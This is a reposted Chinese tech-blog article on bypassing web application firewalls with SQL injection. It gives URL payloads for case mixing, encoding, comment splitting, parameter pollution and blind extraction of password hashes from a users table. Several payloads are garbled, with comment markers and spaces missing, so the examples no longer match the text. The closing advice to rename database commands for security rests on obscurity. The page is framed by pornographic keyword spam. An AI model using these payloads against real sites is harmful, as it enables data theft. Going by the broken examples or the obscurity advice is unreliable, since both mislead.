精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

看牛人怎么突破WAF防御

安全 應(yīng)用安全
當(dāng)所有的系統(tǒng)安全防御做好后,剩下恐怕就是SQL注入,跨站攻擊等等web應(yīng)用層防御了,這也是廣大站長(zhǎng)最困擾的東東了,幾日前寫的“安全寶構(gòu)架技術(shù)猜測(cè)與高級(jí)網(wǎng)絡(luò)安全防御”講解了一種最簡(jiǎn)單的高性能防御方方法,根據(jù)自己的情況稍微修改下,就可以應(yīng)付大部分的攻擊了,可是就萬事大吉了嗎?

當(dāng)所有的系統(tǒng)安全防御做好后,剩下恐怕就是SQL注入,跨站攻擊等等web應(yīng)用層防御了,這也是廣大站長(zhǎng)最困擾的東東了,幾日前寫的“安全寶構(gòu)架技術(shù)猜測(cè)與高級(jí)網(wǎng)絡(luò)安全防御”講解了一種最簡(jiǎn)單的高性能防御方方法,根據(jù)自己的情況稍微修改下,就可以應(yīng)付大部分的攻擊了,可是就萬事大吉了嗎?

首先我們回顧下網(wǎng)上牛人是怎么突破waf防御:

1.大小寫繞過

這個(gè)大家都很熟悉,對(duì)于一些太垃圾的WAF效果顯著,比如攔截了union,那就使用UnionUnIoN等等繞過。

2.簡(jiǎn)單編碼繞過

比如WAF檢測(cè)關(guān)鍵字,那么我們讓他檢測(cè)不到就可以了。比如檢測(cè)union,那么我們就用U也就是U的16進(jìn)制編碼來代替U,union寫成UnION,結(jié)合大小寫也可以繞過一些WAF,你可以隨意替換一個(gè)或幾個(gè)都可以。

也還有大家在Mysql注入中比如表名或是load文件的時(shí)候,會(huì)把文件名或是表明用16進(jìn)制編碼來繞過WAF都是屬于這類。

3.注釋繞過

這種情況比較少,適用于WAF只是過濾了一次危險(xiǎn)的語(yǔ)句,而沒有阻斷我們的整個(gè)查詢。

01./?id=1+union+select+1,2,3unionselect+1,2,31,2,3,4…

可以看到,只要我們把敏感詞放到注釋里面,注意,前面要加一個(gè)!

4.分隔重寫繞過

還是上面的例子,適用于那種WAF采用了正則表達(dá)式的情況,會(huì)檢測(cè)所有的敏感字,而不在乎你寫在哪里,有幾個(gè)就過濾幾個(gè)。

我們可以通過注釋分開敏感字,這樣WAF的正則不起作用了,而帶入查詢的時(shí)候并不影響我們的結(jié)果。

01./?id=1+union+select+1,2,3--

至于重寫繞過,適用于WAF過濾了一次的情況,和我們上傳aaspsp馬的原理一樣,我們可以寫出類似Ununionion這樣的。過濾一次union后就會(huì)執(zhí)行我們的查詢了。

01.?id=1ununionionselect1,2,3--

5.Http參數(shù)污染(HPP)

比如我們有這樣的語(yǔ)句:

01./?id=1unionselect+1,2,3+from+users+where+id=1--

我們可以重復(fù)一次前面的id值添加我們的值來繞過,&id=會(huì)在查詢時(shí)變成逗號(hào):

01./?id=1unionselect+1&id=2,3+from+users+where+id=1--

這種情況成功的條件比較多,取決于具體的WAF實(shí)現(xiàn)。

再給出一個(gè)例子說明用法:

01./?id=1unionselectpwdfromusers--

具體分析的話就涉及到查詢語(yǔ)句的后臺(tái)代碼的編寫了。

比如服務(wù)器是這樣寫的:

01.select*fromtablewherea=".$_GET['a']."andb=".$_GET['b']."limit".$_GET['c'];

那我們可以構(gòu)造這樣的注入語(yǔ)句:

01./?a=1+unionselect+1,passfrom+users--

最終解析為:

01.select*fromtablewherea=1unionselect1,passfromusers--

可以看到,這種方式其實(shí)比較適合白盒測(cè)試,而對(duì)于黑盒滲透的話,用起來比較麻煩。但是也可以一試。

#p#

6.使用邏輯運(yùn)算符or/and繞過

01./?id=1+OR+0x50=0x50

02./?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

順便解釋一下第二句話,從最里面的括號(hào)開始分析,select+pwd+from+users+limit+1,1這句是從users表里查詢pwd字段的第一條記錄,比如是admin,

然后mid(上一句),1,1就是取admin的第一個(gè)字符,也就是a,

lower(上一句)就是把字符轉(zhuǎn)換為小寫,

然后ascii就是把a(bǔ)轉(zhuǎn)換成ascii碼,看等不等于74。

7.比較操作符替換

包括!=不等于,<>不等于,<小于,>大于,這些都可以用來替換=來繞過。

比如上一個(gè)例子,要判斷是不是74,假設(shè)=被過濾,那么我們可以判斷是不是大于73,是不是小于75,然后就知道是74了。。很多WAF都會(huì)忘了這個(gè)。

8.同功能函數(shù)替換

Substring()可以用mid(),substr()這些函數(shù)來替換,都是用來取字符串的某一位字符的。

Ascii()編碼可以用hex(),bin(),也就是16進(jìn)制和二進(jìn)制編碼替換。Benchmark()可以用sleep()來替換,這兩個(gè)使用在基于延時(shí)的盲注中,有機(jī)會(huì)給大家介紹。

如果連這些都屏蔽了,還有一種新的方法:

01.substring((select'password'),1,1)=0x70

02.substr((select'password'),1,1)=0x70

03.mid((select'password'),1,1)=0x70

比如這三條,都是從password里判斷第一個(gè)字符的值,可以用:

01.strcmp(left('password',1),0x69)=1

02.strcmp(left('password',1),0x70)=0

03.strcmp(left('password',1),0x71)=-1

來替換,left用來取字符串左起1位的值,strcmp用來比較兩個(gè)值,如果比較結(jié)果相等就為0,左邊小的話就為-1,否則為1。

還有我前幾篇說過的group_concat和concat和concat_ws也可以互相替換。

9.盲注無需or和and

比如有這樣一個(gè)注入點(diǎn):

01.index.php?uid=123

and、or被過濾了,其實(shí)有一種更直接的方法,我們直接修改123為我們的語(yǔ)句生成的:

01.index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123

123的時(shí)候頁(yè)面是正確的,我們現(xiàn)在在盲猜hash的第一位,如果第一位等于0x42也就是B,那么strcmp結(jié)果為0,0+123=123,所以頁(yè)面應(yīng)該是正確的。否則就說明不是B,就這樣猜,不用and和or了。

10.加括號(hào)

01./?id=1+union+(select+1,2+from+users)

比如,上面這一條被WAF攔截了。可以試試加一些括號(hào):

01./?id=1+union+(select+1,2+from+xxx)

02./?id=(1)union(select(1),mid(hash,1,32)from(users))

03./?id=1+union+(select'1',concat(login,hash)from+users)

04./?id=(1)union(((((((select(1),hex(hash)from(users))))))))

05./?id=(1)or(0x50=0x50)

11.緩沖區(qū)溢出繞過

這個(gè)是從國(guó)外一個(gè)博客看到的:

01.id=1and(select1)=(Select0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),

8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

02.,27,28,29,30,31,32,33,34,35,36–+

其中0xAAAAAAAAAAAAAAAAAAAAA這里A越多越好,一般要求1000個(gè)以上。

以上就是網(wǎng)上盛傳的突破方法,本人沒時(shí)間去試,也不想去試,這里有一個(gè)問題,為什么會(huì)有千千萬萬個(gè)漏洞,攻擊方法,防不勝防,有沒有一個(gè)根本的方法解決所有已知,未知的漏洞攻擊呢?

#p#

其實(shí)歸根到底,我們用的linuxwinmysql等等都是別人開發(fā)的,不是自己的東西,開源的好處就是你可以用,但是你不好保密!所以要解決問題,還得從軟件,系統(tǒng)的開發(fā)開始,哪怕簡(jiǎn)單的二次開發(fā)都可以防御很多攻擊:

1,假如自己能對(duì)mysql進(jìn)行二次開發(fā),把所有的selectunion命令簡(jiǎn)單的改名,改成沒有人知道的只有你自己知道的名字,你用擔(dān)心sql注入嗎?

2,假如自己對(duì)mysql進(jìn)行二次開發(fā),改變sql標(biāo)準(zhǔn),邏輯,你還怕orand注入嗎?

3,假如自己定義一套自己的開發(fā)語(yǔ)言,不用什么cphp你還怕什么益處嗎?

4,大規(guī)模定制改造linux把所有的命令,系統(tǒng)調(diào)用經(jīng)行二次開發(fā),你還怕黑客入侵嗎?人家連ls命令都不知道怎么弄!

雖然有違開源精神,但是現(xiàn)在很多的閉源軟件,防火墻早就這么干了,說白了,保密的東東,最安全,自己創(chuàng)造的東東,才是最可靠的,畢竟你可以隨意定制更改,隨意擴(kuò)展開發(fā)!當(dāng)然如果沒有這個(gè)技術(shù)條件我們可以這么做,讓黑客崩潰到底!

1,完全拋棄mysqlmongodb等有sql注入風(fēng)險(xiǎn)的數(shù)據(jù)庫(kù),采用redis或其他簡(jiǎn)單的能滿足你當(dāng)前業(yè)務(wù)的nosql數(shù)據(jù)庫(kù),實(shí)在要邏輯,要什么觸發(fā)功能,請(qǐng)用luaphp實(shí)現(xiàn),清除所有無用的功能,就和linux權(quán)限一樣顆粒化一切,不要的,無用的統(tǒng)統(tǒng)丟掉,一個(gè)不剩!

2,對(duì)當(dāng)前采用linux系統(tǒng)nginxapache等等,全部進(jìn)行源代碼簡(jiǎn)單修改,核心功能算法不能更改,我們就不能更改命令名稱,用戶ui接口?打個(gè)比方把mysql的select命令和各種對(duì)應(yīng)的編碼調(diào)用名稱改掉,哪里來的sql注入呢?

好了,希望大家參考就好,千萬不要把系統(tǒng)改的面目全非,連自己都用不了,支持開源,不要僅僅停留在使用層,我們還是要努力成為開源軟件開發(fā)者,或者多提出自己的創(chuàng)新建議,任何事情不要盲目去跟風(fēng),人家用,你也取用,夠用就好是一種簡(jiǎn)單而高深的哲學(xué)。

(本文出自 “清蒸BSD紅燒LINUX” 博客,轉(zhuǎn)載請(qǐng)務(wù)必保留此出處http://cookingbsd.blog.51cto.com/5404439/1196198)

 

責(zé)任編輯:吳瑋 來源: 51CTO.com
相關(guān)推薦

2014-12-16 10:23:59

2013-05-22 18:20:18

2013-05-22 18:06:41

2013-05-22 17:43:21

2013-05-22 18:32:57

2009-03-11 17:04:53

2023-12-03 21:52:20

2010-09-16 20:54:21

2011-05-17 09:36:57

div+css

2015-10-08 10:46:46

技術(shù)牛人管理牛人

2015-08-05 11:32:10

2018-08-02 15:36:08

2015-12-16 13:38:06

WiFi路由器

2010-09-08 17:27:10

2021-04-16 10:32:28

蜜罐網(wǎng)絡(luò)安全

2022-06-30 11:03:27

DDoS攻擊WAF

2022-06-30 08:55:15

DDoSWAF網(wǎng)絡(luò)攻擊

2018-10-22 09:30:09

瑞數(shù)信息WAFRiver Safep

2011-11-09 10:53:54

2012-05-22 16:52:02

編程語(yǔ)言
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

亚洲高清在线看| 欧美大片免费播放器| 久久77777| 高清成人在线观看| 2025国产精品视频| 摸摸摸bbb毛毛毛片| 亚洲精品大片| 欧美日韩国产一区在线| 亚洲精品乱码视频| 好吊色一区二区| 爽爽淫人综合网网站| 中文国产亚洲喷潮| 国产精品久久久久久亚洲av| 成人深夜福利| 欧美日韩精品在线观看| 在线免费观看成人| 欧美男男同志| 国产成人av电影| 国产精品视频99| 国产福利拍拍拍| 97人人精品| 日韩精品免费在线| 亚洲国产日韩在线一区| 吞精囗交69激情欧美| 一区二区三区毛片| 亚洲午夜精品久久| 青春有你2免费观看完整版在线播放高清| 六月丁香婷婷色狠狠久久| 性色av一区二区三区红粉影视| 国产精品久久久免费看| 色先锋久久影院av| 日韩欧美国产三级电影视频| 粉色视频免费看| 成人av免费电影网站| 亚洲一卡二卡三卡四卡五卡| 在线一区亚洲| 草碰在线视频| 久久夜色精品国产欧美乱极品| 国产 高清 精品 在线 a| 国产精品欧美亚洲| 蜜臀av性久久久久av蜜臀妖精| 欧美亚洲成人网| 亚洲国产精品午夜在线观看| 欧美jizzhd精品欧美巨大免费| 在线观看视频99| 亚洲熟妇无码av| 亚洲精品推荐| 日韩精品一区二区三区第95| 日本少妇xxxx| 97超碰成人| 精品国产乱子伦一区| 宇都宫紫苑在线播放| 四虎精品在线观看| 欧美性受xxxx黑人xyx性爽| 国语对白做受xxxxx在线中国| 国产va在线视频| 性久久久久久久| 精品无码国产一区二区三区av| 18videosex性欧美麻豆| 亚洲人123区| 久久久久久久久影视| 国产婷婷视频在线 | 青青草视频播放| 99a精品视频在线观看| 精品国产青草久久久久福利| 中文字幕视频观看| 国内精品国产成人国产三级粉色| 精品国产1区2区3区| 97中文字幕在线观看| av一级亚洲| 日本黄网站色大片免费观看| 精品999视频| 久久精品夜色噜噜亚洲a∨| 欧美不卡福利| 高清美女视频一区| 国产精品久久久久婷婷| 久久福利视频网| 免费在线观看黄色小视频| 99热精品久久| 欧美黄色片在线观看| 精品一级少妇久久久久久久| 午夜一区不卡| 国产欧美精品一区二区| 国产999久久久| 成人动漫一区二区| 欧美日韩中文国产一区发布| h视频在线播放| 亚洲欧美激情视频在线观看一区二区三区| 黄色一级片国产| 性爽视频在线| 欧美美女一区二区三区| 中文字幕三级电影| 日本电影一区二区| 欧美富婆性猛交| 黄色av网站免费观看| 国产在线一区观看| 欧美成熟毛茸茸复古| 快射视频在线观看| 粉嫩老牛aⅴ一区二区三区| 三上悠亚在线一区二区| 日本精品视频| 亚洲人成电影网站| 性欧美videos| 日韩在线播放一区二区| 91入口在线观看| 无码h黄肉3d动漫在线观看| 亚洲国产岛国毛片在线| 久久久久久久久久久综合| 日韩电影大全网站| 欧美草草影院在线视频| 亚洲码无人客一区二区三区| 中文字幕亚洲精品乱码| 2021国产精品视频| 亚洲成人久久精品| 国产精品美女久久久久av爽李琼 | 亚洲精品无amm毛片| 国产色产综合产在线视频| 97久久国产亚洲精品超碰热| 激情久久一区二区| 亚洲精品中文字| 国产亚洲成人精品| 久久激情久久| 91在线网站视频| 午夜视频在线| 在线观看一区二区视频| 青青草视频播放| 亚洲国产第一| 国产精品91久久| 香蕉视频黄在线观看| 亚洲一区二区视频| 麻豆传媒在线看| 国产精品成人一区二区不卡| 国产精品久久一区| 麻豆导航在线观看| 欧美日韩激情小视频| 国模无码视频一区| 欧美三级视频| av成人免费观看| 伊人福利在线| 欧美大肚乱孕交hd孕妇| 永久免费看黄网站| 韩国三级中文字幕hd久久精品| 亚洲欧美日韩在线综合| 国产精品亚洲一区二区三区在线观看| 日韩一二三四区| 国产黄色大片免费看| 日韩中文字幕不卡| 日本不卡在线观看| 欧美××××黑人××性爽| 亚洲天堂色网站| 国产精品尤物视频| 国产视频在线观看一区二区三区 | 日本精品在线中文字幕| 亚洲女在线观看| 亚洲成人av影片| 久久嫩草精品久久久久| 黑人糟蹋人妻hd中文字幕| 九九热爱视频精品视频| 国产成人综合亚洲| 草碰在线视频| 91精品国产福利| 久草国产在线视频| av网站免费线看精品| 国产一区二区网| 国产99久久| 国产精品视频中文字幕91| 欧美边添边摸边做边爱免费| 欧美一区二区私人影院日本| 爱爱视频免费在线观看| 国产成a人亚洲精品| 少妇av一区二区三区无码| 一区二区三区四区在线看| 国产精品成人观看视频国产奇米| 91女主播在线观看| 日韩欧美色综合| 国产成人在线播放视频| 久久婷婷一区二区三区| 亚洲欧美自拍另类日韩| 欧美~级网站不卡| 久久国产精品一区二区三区四区 | 成人3d动漫一区二区三区91| 97在线超碰| 亚洲视频在线播放| 国产精品自产拍| 精品久久久视频| 亚洲精品国产精品国自产在线 | 国产激情欧美| 久久香蕉频线观| 午夜视频在线播放| 欧美三日本三级三级在线播放| 国产真实乱在线更新| av欧美精品.com| 美女在线视频一区二区| 国产一区清纯| 五月天综合网| 999久久久精品一区二区| 国产成人高清激情视频在线观看| 国产激情小视频在线| 亚洲国产精品成人一区二区| 中日精品一色哟哟| 亚洲成人tv网| 午夜精品久久久久99蜜桃最新版| 成人综合婷婷国产精品久久| 亚洲一区二区三区四区五区xx| 欧美成人综合| 日本一区二区在线视频| 成人av激情人伦小说| 国产风韵犹存在线视精品| 精品欧美一区二区精品久久| 亚洲欧美在线人成swag| 日韩av免费在线看| 黄色影院在线看| 日韩在线视频中文字幕| 日本一区视频| 亚洲成人黄色在线| 国产美女自慰在线观看| 欧洲精品视频在线观看| 国产无遮挡又黄又爽| 成人欧美一区二区三区1314| 久久久精品人妻无码专区| 国产成人鲁色资源国产91色综| 中文字幕天天干| 久久久久久穴| 国产精品无码av在线播放| 欧美国产综合| 亚洲日本理论电影| 欧美理论在线播放| 久久青青草综合| 精品少妇3p| 国产成人av一区二区三区| 999久久久国产999久久久| 国产精品高清在线观看| 在线观看v片| 91av在线播放| 97久久人人超碰caoprom| 欧美国产在线电影| 18视频在线观看网站| 久热国产精品视频| 黄av在线免费观看| zzijzzij亚洲日本成熟少妇| 日本天堂在线观看| 日韩中文在线中文网三级| 91啦中文在线| y97精品国产97久久久久久| 毛片在线不卡| 久久久999精品免费| 中文字幕中文字幕在线十八区 | 日本精品裸体写真集在线观看| 51精品国产黑色丝袜高跟鞋| 日本黄色免费在线| 91黄色8090| 亚洲人体视频| 国产精品高潮呻吟久久av黑人| 成人午夜一级| 成人伊人精品色xxxx视频| 日韩一区网站| 国产综合第一页| 国产成人影院| 亚洲三区在线观看| 91精品一区国产高清在线gif| 91传媒免费视频| 在线播放日韩| www.亚洲天堂网| 久久精品国产色蜜蜜麻豆| 一区二区久久精品| 粉嫩av亚洲一区二区图片| 国产午夜在线一区二区三区| 91亚洲精品一区二区乱码| 自拍偷拍视频亚洲| 国产精品不卡在线观看| 久草视频免费播放| 日韩欧美国产成人| 在线免费观看一区二区| 日韩亚洲欧美在线| 天堂网www中文在线| 正在播放国产一区| 日本孕妇大胆孕交无码| 日本成人免费在线| 图片一区二区| 久久99国产精品99久久| 日韩一区二区在线| 亚洲一区二区视频| 青青草视频播放| 欧美激情一区在线观看| 动漫性做爰视频| 精品久久久久久久久久久| 免费黄色一级大片| 精品久久人人做人人爱| 国产精品一区二区婷婷| 欧美另类在线播放| 一区二区三区短视频| 成人网页在线免费观看| 亲子伦视频一区二区三区| 亚洲一区二区三区色| 在线不卡视频| 亚洲网中文字幕| 久久精品人人爽人人爽| 久久久国产成人| 欧美午夜不卡在线观看免费| 欧美 日韩 国产 成人 在线| 中文字幕亚洲欧美日韩高清| а√在线天堂官网| 成人中心免费视频| 亚洲三级性片| 国产无限制自拍| 精品一区二区三区在线观看 | 青青草av网站| 成人激情午夜影院| 中国一级片在线观看| 日本韩国欧美在线| 神马一区二区三区| 色综合视频一区中文字幕| 精品久久毛片| 欧美日韩在线精品一区二区三区| 国产精品xvideos88| 999在线观看| 欧美国产97人人爽人人喊| 国产午夜精品无码| 欧美一区二区大片| 伊人免费在线| 国产精品久久久久高潮| 亚洲国产最新| 欧美在线观看www| 国产精品一品二品| 亚洲人与黑人屁股眼交| 欧美性高清videossexo| 神马久久久久| 18性欧美xxxⅹ性满足| 国产日韩三级| 日韩一级性生活片| 国产69精品久久久久777| 欧美一区二区三区爽爽爽| 欧美日韩不卡视频| 1024国产在线| 国产在线视频91| 91一区在线| 中文字幕22页| 国产精品的网站| 日本77777| 动漫3d精品一区二区三区乱码| 日韩激情视频| 日韩高清不卡一区二区三区| 在线小视频你懂的| 日本韩国一区二区三区视频| 黄色片视频在线观看| 日韩av电影在线播放| 国产一区毛片| 在线观看av网页| 国产精品不卡视频| 国产麻豆91视频| 欧美极品少妇与黑人| 粉嫩一区二区三区四区公司1| 国产毛片视频网站| 久久午夜国产精品| 欧美性受xxx黑人xyx性爽| 伊人伊成久久人综合网站| 亚洲天堂1区| 一级日韩一区在线观看| 国产一区三区三区| 久久黄色免费网站| 国产视频精品久久久| 色豆豆成人网| 少妇高潮流白浆| 成人黄色av电影| 亚洲欧美综合另类| 一本色道久久88综合日韩精品| 色8久久久久| 欧美xxxx吸乳| 99re这里都是精品| 波多野结衣网站| 日本韩国欧美国产| 国产婷婷视频在线| 激情伦成人综合小说| 久久精品系列| 欧美a级片免费看| 精品日韩欧美一区二区| 第84页国产精品| 宅男在线精品国产免费观看| 高清成人免费视频| 成人av网站在线播放| 欧美精品生活片| 蜜乳av综合| 天天av天天操| 好吊成人免视频| 日本福利在线| 国产一区免费| 男男视频亚洲欧美| 免费在线看黄网址| 在线播放国产一区二区三区| 亚洲乱码一区| 国产主播中文字幕| 亚洲一区二区视频在线| 99免在线观看免费视频高清| 成人免费观看网站| 日本欧美一区二区三区乱码| 黄色片在线观看网站| 亚洲人成欧美中文字幕| 136国产福利精品导航网址应用| 午夜视频在线瓜伦| 亚洲国产成人tv|